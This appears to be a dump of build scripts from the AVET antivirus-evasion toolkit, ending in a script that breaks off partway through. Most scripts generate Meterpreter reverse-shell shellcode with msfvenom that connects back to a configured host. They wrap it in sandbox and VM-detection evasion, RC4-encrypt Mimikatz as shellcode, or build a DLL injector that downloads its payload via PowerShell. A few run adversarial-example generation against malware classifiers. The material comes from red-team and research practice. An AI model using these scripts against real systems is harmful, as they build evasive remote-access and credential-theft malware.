build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="extend" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_padding.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . build/feature_construction.sh 13 | 14 | 15 | 16 | 17 | 18 | FILES="input/malware-filtered2/*" 19 | N=3 20 | practical_manipulation="padding" 21 | population_size=100 22 | section_size=5 23 | 24 | for f in $FILES 25 | do 26 | ((i=i%N)); ((i++==0)) && wait 27 | 28 | ( cp $f output/ 29 | # generate adversarial example 30 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 31 | 32 | # cleanup 33 | rm output/$(basename "$f") 34 | # cleanup_techniques 35 | ) & 36 | done 37 | 38 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_shift.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="shift" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_eval_adversarial_si.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # print AVET logo 4 | cat banner.txt 5 | 6 | # include script containing the compiler var $win64_compiler 7 | # you can edit the compiler in build/global_win64.sh 8 | # or enter $win64_compiler="mycompiler" here 9 | . build/global_win64.sh 10 | 11 | # import feature construction interface 12 | . build/feature_construction.sh 13 | 14 | 15 | 16 | FILES="input/malware-filtered2/*" 17 | N=3 18 | practical_manipulation="section_injection" 19 | population_size=100 20 | section_size=5 21 | 22 | for f in $FILES 23 | do 24 | ((i=i%N)); ((i++==0)) && wait 25 | 26 | ( cp $f output/ 27 | 28 | # generate adversarial example 29 | $genetic_optimizer -ss $section_size -pm $practical_manipulation -p $population_size output/$(basename "$f") 30 | 31 | # cleanup 32 | rm output/$(basename "$f") 33 | # cleanup_techniques 34 | ) & 35 | done 36 | 37 | wait -------------------------------------------------------------------------------- /build/build_fibonacci_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Performs a small amount of dummy computations before executing the payload. 5 | # This small number of iterations is unlikely to timeout real-world sandboxes. This script is included for experimental reasons. 6 | # RC4-encrypt the payload with a static, preset key. 7 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 8 | # pe_to_shellcode is written by Hasherezade: 9 | # https://github.com/hasherezade/pe_to_shellcode 10 | 11 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 12 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 13 | #DESCRIPTION_END 14 | 15 | # print AVET logo 16 | cat banner.txt 17 | 18 | # include script containing the compiler var $win64_compiler 19 | # you can edit the compiler in build/global_win64.sh 20 | # or enter $win64_compiler="mycompiler" here 21 | . build/global_win64.sh 22 | 23 | # import feature construction interface 24 | . build/feature_construction.sh 25 | 26 | 27 | #CONFIGURATION_START 28 | # enable debug output 29 | enable_debug_print 30 | # generate key file with preset key 31 | generate_key preset aabbccdd1122 input/key_raw.txt 32 | #CONFIGURATION_END 33 | 34 | ## compute one million elements of the fibonacci series before payload execution 35 | add_evasion computation_fibonacci 1000000 36 | 37 | # no command execution 38 | set_command_source no_data 39 | set_command_exec no_command 40 | 41 | # convert mimikatz executable into shellcode format 42 | # Can be of course used with other .exe files 43 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 44 | # encrypt payload 45 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 46 | 47 | # convert encoded, raw payload into c format for static include 48 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 49 | 50 | # set payload source 51 | set_payload_source static_from_file input/sc_enc_c.txt 52 | 53 | # set decoder 54 | set_decoder rc4 55 | 56 | # convert key to c format and include statically 57 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 58 | set_key_source static_from_file input/key_c.txt 59 | 60 | # set payload info source 61 | set_payload_info_source no_data 62 | 63 | # set shellcode binding technique 64 | set_payload_execution_method exec_shellcode64 65 | 66 | 67 | # compile to exe file 68 | $win64_compiler -o output/fibonacci_rc4_mimikatz.exe source/avet.c 69 | strip output/fibonacci_rc4_mimikatz.exe 70 | 71 | # cleanup 72 | cleanup_techniques 73 | 74 | 75 | echo " 76 | # The decryption key is aabbccdd1122 if it has not been changed. 77 | # You need to provide the decryption key as 2nd command line argument. 78 | # Call generated executable on target like: 79 | # $ fibonacci_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 80 | " 81 | -------------------------------------------------------------------------------- /build/build_fopen_mtrprtrxor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Executes 64-bit shellcode. 6 | # Uses Metasploit's xor encoding. Uses fopen sandbox evasion. 7 | #DESCRIPTION_END 8 | 9 | 10 | # include script containing the compiler var $win64_compiler 11 | # you can edit the compiler in build/global_win64.sh 12 | # or enter $win64_compiler="mycompiler" here 13 | . build/global_win64.sh 14 | 15 | # import feature construction interface 16 | . build/feature_construction.sh 17 | 18 | # import global default lhost and lport values from build/global_connect_config.sh 19 | . build/global_connect_config.sh 20 | 21 | 22 | #CONFIGURATION_START 23 | # override connect-back settings here, if necessary 24 | LPORT=$GLOBAL_LPORT 25 | LHOST=$GLOBAL_LHOST 26 | # no command preexec 27 | set_command_source no_data 28 | set_command_exec no_command 29 | # enable debug output 30 | enable_debug_print 31 | #CONFIGURATION_END 32 | 33 | 34 | # make meterpreter reverse payload 35 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f c --platform Windows > input/sc_c.txt 36 | 37 | # add fopen sandbox evasion technique 38 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 39 | 40 | # set shellcode source 41 | set_payload_source static_from_file input/sc_c.txt 42 | 43 | # set decoder and key source 44 | set_decoder none 45 | set_key_source no_data 46 | 47 | # set payload info source 48 | set_payload_info_source no_data 49 | 50 | # set shellcode binding technique 51 | set_payload_execution_method exec_shellcode64 52 | 53 | 54 | # compile 55 | $win64_compiler -o output/fopen_mtrprtrxor_revhttps_win64.exe source/avet.c 56 | strip output/fopen_mtrprtrxor_revhttps_win64.exe 57 | 58 | # cleanup 59 | cleanup_techniques 60 | 61 | echo " 62 | # Execute the following command: 63 | # $ fopen_mtrprtrxor_revhttps_win64.exe 64 | " -------------------------------------------------------------------------------- /build/build_fopen_quiet_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Perform fopen sandbox evasion, encode with shikata and hide console window. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add fopen sandbox evasion 40 | add_evasion fopen_sandbox_evasion 'C:\\windows\\system.ini' 41 | # enable quiet mode / hide console window 42 | add_evasion hide_console 43 | 44 | # set shellcode source 45 | set_payload_source static_from_file input/sc_c.txt 46 | 47 | # set decoder and key source 48 | set_decoder none 49 | set_key_source no_data 50 | 51 | # set payload info source 52 | set_payload_info_source no_data 53 | 54 | #set shellcode binding technique 55 | set_payload_execution_method exec_shellcode 56 | 57 | # compile 58 | $win32_compiler -o output/fopen_quiet_revhttps_win32.exe source/avet.c 59 | strip output/fopen_quiet_revhttps_win32.exe 60 | 61 | # cleanup 62 | cleanup_techniques 63 | 64 | 65 | echo " 66 | # Execute the following command: 67 | # $ fopen_quiet_revhttps_win32.exe 68 | " 69 | -------------------------------------------------------------------------------- /build/build_fopen_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform fopen sandbox evasion. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add fopen sandbox evasion 40 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | # compile 56 | $win32_compiler -o output/fopen_revhttps_win32.exe source/avet.c 57 | strip output/fopen_revhttps_win32.exe 58 | 59 | # cleanup 60 | cleanup_techniques 61 | 62 | 63 | echo " 64 | # Execute the following command: 65 | # $ fopen_revhttps_win32.exe 66 | " 67 | -------------------------------------------------------------------------------- /build/build_getchar_rc4_mimikatz.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | #DESCRIPTION_START 4 | # Wait for input via getchar() before executing the payload. 5 | # RC4-encrypt the payload with a static, preset key. 6 | # Here, the mimikatz executable is used as payload, converted into shellcode format by pe_to_shellcode. 7 | # pe_to_shellcode is written by Hasherezade: 8 | # https://github.com/hasherezade/pe_to_shellcode 9 | 10 | # This script expects the Mimikatz executable to be at input/mimikatz.exe 11 | # and the pe_to_shellcode executable to reside in a folder parallel to avet: ../pe_to_shellcode/pe2shc.exe 12 | #DESCRIPTION_END 13 | 14 | # print AVET logo 15 | cat banner.txt 16 | 17 | # include script containing the compiler var $win64_compiler 18 | # you can edit the compiler in build/global_win64.sh 19 | # or enter $win64_compiler="mycompiler" here 20 | . build/global_win64.sh 21 | 22 | # import feature construction interface 23 | . build/feature_construction.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # enable debug output 28 | enable_debug_print 29 | # generate key file with preset key 30 | generate_key preset aabbccdd1122 input/key_raw.txt 31 | #CONFIGURATION_END 32 | 33 | ## Call getchar to provoke user interaction 34 | add_evasion interaction_getchar 35 | 36 | # no command execution 37 | set_command_source no_data 38 | set_command_exec no_command 39 | 40 | # convert mimikatz executable into shellcode format 41 | # Can be of course used with other .exe files 42 | wine ./../pe_to_shellcode/pe2shc.exe input/mimikatz.exe input/sc_raw.txt 43 | # encrypt payload 44 | encode_payload rc4 input/sc_raw.txt input/sc_enc_raw.txt input/key_raw.txt 45 | 46 | # convert encoded, raw payload into c format for static include 47 | ./tools/data_raw_to_c/data_raw_to_c input/sc_enc_raw.txt input/sc_enc_c.txt buf 48 | 49 | # set payload source 50 | set_payload_source static_from_file input/sc_enc_c.txt 51 | 52 | # set decoder 53 | set_decoder rc4 54 | 55 | # convert key to c format and include statically 56 | ./tools/data_raw_to_c/data_raw_to_c input/key_raw.txt input/key_c.txt key 57 | set_key_source static_from_file input/key_c.txt 58 | 59 | # set payload info source 60 | set_payload_info_source no_data 61 | 62 | # set shellcode binding technique 63 | set_payload_execution_method exec_shellcode64 64 | 65 | 66 | # compile to exe file 67 | $win64_compiler -o output/getchar_rc4_mimikatz.exe source/avet.c 68 | strip output/getchar_rc4_mimikatz.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | 74 | echo " 75 | # The decryption key is aabbccdd1122 if it has not been changed. 76 | # You need to provide the decryption key as 2nd command line argument. 77 | # Call generated executable on target like: 78 | # $ getchar_rc4_mimikatz_win64.exe [your mimikatz arguments, probably 'coffee'] [decryption key] 79 | " 80 | -------------------------------------------------------------------------------- /build/build_gethostbyname_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and perform gethostbyname sandbox evasion. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add gethostbyname sandbox evasion 40 | add_evasion gethostbyname_sandbox_evasion 'this.that' 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | set_decoder none 47 | set_key_source no_data 48 | 49 | # set payload info source 50 | set_payload_info_source no_data 51 | 52 | # set shellcode binding technique 53 | set_payload_execution_method exec_shellcode 54 | 55 | 56 | # compile 57 | $win32_compiler -o output/gethostbyname_revhttps_win32.exe source/avet.c -lws2_32 58 | strip output/gethostbyname_revhttps_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ gethostbyname_revhttps_win32.exe 67 | " -------------------------------------------------------------------------------- /build/build_has_process_exit_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Apply shikata and exit if a given process is found 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # generate payload and call avet 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add has_process_exit, just quit if the process is running 40 | add_evasion has_process_exit 'iexplore.exe' 41 | 42 | # note: it is possible to add several lines if program should quit on multiple processes, like: 43 | # add_evasion has_process_exit 'OLLYDBG.EXE' 44 | 45 | # set shellcode source 46 | set_payload_source static_from_file input/sc_c.txt 47 | 48 | # set decoder and key source 49 | set_decoder none 50 | set_key_source no_data 51 | 52 | # set payload info source 53 | set_payload_info_source no_data 54 | 55 | # set shellcode binding technique 56 | set_payload_execution_method exec_shellcode 57 | 58 | 59 | # compile, bit dirty with fpermissive 60 | $win32cpp_compiler -fpermissive -o output/has_process_exit_revhttps_win32.exe source/avet.c -lws2_32 61 | strip output/has_process_exit_revhttps_win32.exe 62 | 63 | # cleanup 64 | cleanup_techniques 65 | 66 | 67 | echo " 68 | # Execute the following command: 69 | # $ has_process_exit_revhttps_win32.exe 70 | " -------------------------------------------------------------------------------- /build/build_hasvmkey_revhttps_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use AVET encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add fopen sandbox evasion 40 | add_evasion has_vm_regkey 'VMWARE,VBOX,VIRTUAL,VMware' 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | # AVET decoder needs no key 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # enable debug output 57 | enable_debug_print 58 | 59 | # compile to exe file 60 | $win32_compiler -o output/hasvmkey_revhttps_win32.exe source/avet.c 61 | strip output/hasvmkey_revhttps_win32.exe 62 | 63 | # cleanup 64 | cleanup_techniques 65 | 66 | 67 | echo " 68 | # Execute the following command: 69 | # $ hasvmkey_revhttps_win32.exe 70 | " 71 | -------------------------------------------------------------------------------- /build/build_hasvmmac_revtcp_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Use AVET encoding. 6 | #DESCRIPTION_END 7 | 8 | 9 | # print AVET logo 10 | cat banner.txt 11 | 12 | # include script containing the compiler var $win32_compiler 13 | # you can edit the compiler in build/global_win32.sh 14 | # or enter $win32_compiler="mycompiler" here 15 | . build/global_win32.sh 16 | 17 | # import feature construction interface 18 | . build/feature_construction.sh 19 | 20 | # import global default lhost and lport values from build/global_connect_config.sh 21 | . build/global_connect_config.sh 22 | 23 | 24 | #CONFIGURATION_START 25 | # override connect-back settings here, if necessary 26 | LPORT=$GLOBAL_LPORT 27 | LHOST=$GLOBAL_LHOST 28 | # no command preexec 29 | set_command_source no_data 30 | set_command_exec no_command 31 | # enable debug output 32 | enable_debug_print 33 | #CONFIGURATION_END 34 | 35 | 36 | # make meterpreter reverse payload, encoded with shikata_ga_nai 37 | msfvenom -p windows/meterpreter/reverse_tcp lhost=$LHOST lport=$LPORT -e x86/shikata_ga_nai -i 3 -f c -a x86 --platform Windows > input/sc_c.txt 38 | 39 | # add fopen sandbox evasion 40 | add_evasion has_vm_mac 41 | 42 | # set shellcode source 43 | set_payload_source static_from_file input/sc_c.txt 44 | 45 | # set decoder and key source 46 | # AVET decoder needs no key 47 | set_decoder none 48 | set_key_source no_data 49 | 50 | # set payload info source 51 | set_payload_info_source no_data 52 | 53 | # set shellcode binding technique 54 | set_payload_execution_method exec_shellcode 55 | 56 | # compile to exe file 57 | $win32_compiler -o output/hasvmmac_revtcp_win32.exe source/avet.c -lws2_32 -liphlpapi 58 | strip output/hasvmmac_revtcp_win32.exe 59 | 60 | # cleanup 61 | cleanup_techniques 62 | 63 | 64 | echo " 65 | # Execute the following command: 66 | # $ hasvmmac_revtcp_win32.exe 67 | " 68 | -------------------------------------------------------------------------------- /build/build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Dll injection 32-bit example build script 6 | # Creates an executable that injects a dll residing on the target's disk into a target process 7 | # Also creates an exec_calc 32-bit dll payload, and downloads the file via powershell onto the target's disk for injection 8 | # Target process and dll can be specified in the third(!) command line argument as format: pid,dll_path 9 | 10 | # The download mechanism, as deployed here, is kind of a workaround to deliver the payload to the target. 11 | # download_powershel is "abused" as payload source, so the file is downloaded and read into memory, but that buffer is not used to deliver the dll. 12 | # Instead, the dll is read from disk (again) by the inject_dll payload execution method, and injected into the target process specified in payload_info. 13 | #DESCRIPTION_END 14 | 15 | 16 | # print AVET logo 17 | cat banner.txt 18 | 19 | # include script containing the compiler var $win32_compiler 20 | # you can edit the compiler in build/global_win32.sh 21 | # or enter $win32_compiler="mycompiler" here 22 | . build/global_win32.sh 23 | 24 | # import feature construction interface 25 | . build/feature_construction.sh 26 | 27 | # import global default lhost and lport values from build/global_connect_config.sh 28 | . build/global_connect_config.sh 29 | 30 | 31 | #CONFIGURATION_START 32 | # override connect-back settings here, if necessary 33 | LPORT=$GLOBAL_LPORT 34 | LHOST=$GLOBAL_LHOST 35 | # no command preexec 36 | set_command_source no_data 37 | set_command_exec no_command 38 | # enable debug output 39 | enable_debug_print 40 | #CONFIGURATION_END 41 | 42 | 43 | # compile exec_calc 32-bit dll payload from source 44 | $win32_compiler test_payloads/exec_calc.c -shared -o output/exec_calc.dll 45 | 46 | # add evasion techniques 47 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 48 | add_evasion gethostbyname_sandbox_evasion 'this.that' 49 | reset_evasion_technique_counter 50 | 51 | # payload will be downloaded from HTTP source via powershell 52 | set_payload_source download_powershell 53 | 54 | # no encoding, no key 55 | # encoding/decoding would make no sense here, as the payload itself is not touched or read in by the executable after download 56 | set_key_source no_data 57 | set_decoder none 58 | 59 | # retrieve payload info (target pid, dll path) from command line on execution 60 | set_payload_info_source from_command_line_raw 61 | 62 | # set payload execution method 63 | set_payload_execution_method inject_dll 64 | 65 | # compile 66 | $win32_compiler -o output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.exe source/avet.c -lws2_32 67 | strip output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.exe 68 | 69 | # cleanup 70 | cleanup_techniques 71 | 72 | echo " 73 | # Host the generated metasploit dll payload via HTTP on port 80 74 | # Call the injector executable like: 75 | # $ injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win32.exe http://yourserver/thepayload.dll random target_pid,thepayload.dll 76 | # 'random' just fills argv[2], which is not needed here 77 | " 78 | -------------------------------------------------------------------------------- /build/build_injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Dll injection 64-bit example build script 6 | # Creates an executable that injects a dll residing on the target's disk into a target process 7 | # Also creates an exec_calc 64-bit dll payload , and downloads the file via powershell onto the target's disk for injection 8 | # Target process and dll can be specified in the third(!) command line argument as format: pid,dll_path 9 | 10 | # The download mechanism, as deployed here, is kind of a workaround to deliver the payload to the target. 11 | # download_powershell is "abused" as payload source, so the file is downloaded and read into memory, but that buffer is not used to deliver the dll. 12 | # Instead, the dll is read from disk (again) by the inject_dll payload execution method, and injected into the target process specified in payload_info. 13 | #DESCRIPTION_END 14 | 15 | 16 | # print AVET logo 17 | cat banner.txt 18 | 19 | # include script containing the compiler var $win64_compiler 20 | # you can edit the compiler in build/global_win64.sh 21 | # or enter $win64_compiler="mycompiler" here 22 | . build/global_win64.sh 23 | 24 | # import feature construction interface 25 | . build/feature_construction.sh 26 | 27 | # import global default lhost and lport values from build/global_connect_config.sh 28 | . build/global_connect_config.sh 29 | 30 | 31 | #CONFIGURATION_START 32 | # override connect-back settings here, if necessary 33 | LPORT=$GLOBAL_LPORT 34 | LHOST=$GLOBAL_LHOST 35 | # no command preexec 36 | set_command_source no_data 37 | set_command_exec no_command 38 | # enable debug output 39 | enable_debug_print 40 | #CONFIGURATION_END 41 | 42 | 43 | # compile exec_calc 64-bit dll payload from source 44 | # the idea was to generate a meterpreter dll payload here via msfvenom, but somehow the meterpreter dll appears to be non-injectible 45 | $win64_compiler test_payloads/exec_calc.c -shared -o output/exec_calc64.dll 46 | 47 | # add evasion techniques 48 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 49 | add_evasion gethostbyname_sandbox_evasion 'this.that' 50 | reset_evasion_technique_counter 51 | 52 | # payload will be downloaded from HTTP source via powershell 53 | set_payload_source download_powershell 54 | 55 | # no encoding, no key 56 | # encoding/decoding would make no sense here, as the payload itself is not touched or read in by the executable after download 57 | set_key_source no_data 58 | set_decoder none 59 | 60 | # retrieve payload info (target pid, dll path) from command line on execution 61 | set_payload_info_source from_command_line_raw 62 | 63 | # set payload execution method 64 | set_payload_execution_method inject_dll 65 | 66 | # compile 67 | $win64_compiler -o output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.exe source/avet.c -lws2_32 68 | strip output/injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.exe 69 | 70 | # cleanup 71 | cleanup_techniques 72 | 73 | echo " 74 | # Host the generated dll payload via HTTP on port 80 75 | # Call the injector executable like: 76 | # $ injectdll_targetfromcmd_execcalc_downloadpsh_fopen_gethostbyname_win64.exe http://yourserver/exec_calc64.dll random target_pid,exec_calc64.dll 77 | # 'random' just fills argv[2], which is not needed here 78 | " 79 | -------------------------------------------------------------------------------- /build/build_injectshc_targetfromcmd_fopen_gethostbyname_xor_revhttps_win64.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | 4 | #DESCRIPTION_START 5 | # Shellcode injection 64-bit example build script 6 | # Creates an executable that injects the payload into a target process 7 | # The target is specified on execution via the third(!) command line argument, by PID 8 | #DESCRIPTION_END 9 | 10 | 11 | # print AVET logo 12 | cat banner.txt 13 | 14 | # include script containing the compiler var $win64_compiler 15 | # you can edit the compiler in build/global_win64.sh 16 | # or enter $win64_compiler="mycompiler" here 17 | . build/global_win64.sh 18 | 19 | # import feature construction interface 20 | . build/feature_construction.sh 21 | 22 | # import global default lhost and lport values from build/global_connect_config.sh 23 | . build/global_connect_config.sh 24 | 25 | 26 | #CONFIGURATION_START 27 | # override connect-back settings here, if necessary 28 | LPORT=$GLOBAL_LPORT 29 | LHOST=$GLOBAL_LHOST 30 | # no command preexec 31 | set_command_source no_data 32 | set_command_exec no_command 33 | # generate key file 34 | generate_key preset aabbcc12de input/key_raw.txt 35 | # enable debug print 36 | enable_debug_print 37 | #CONFIGURATION_END 38 | 39 | 40 | # generate metasploit payload that will later be injected into the target process 41 | msfvenom -p windows/x64/meterpreter/reverse_https lhost=$LHOST lport=$LPORT -e x64/xor -f raw -a x64 --platform Windows > input/sc_raw.txt 42 | 43 | # add evasion techniques 44 | add_evasion fopen_sandbox_evasion 'c:\\windows\\system.ini' 45 | add_evasion gethostbyname_sandbox_evasion 'this.that' 46 | reset_evasion_technique_counter 47 | 48 | # encode msfvenom shellcode 49 | encode_payload xor input/sc_raw.txt input/scenc_raw.txt input/key_raw.txt 50 | 51 | # array name buf is expected by static_from_file retrieval method 52 | 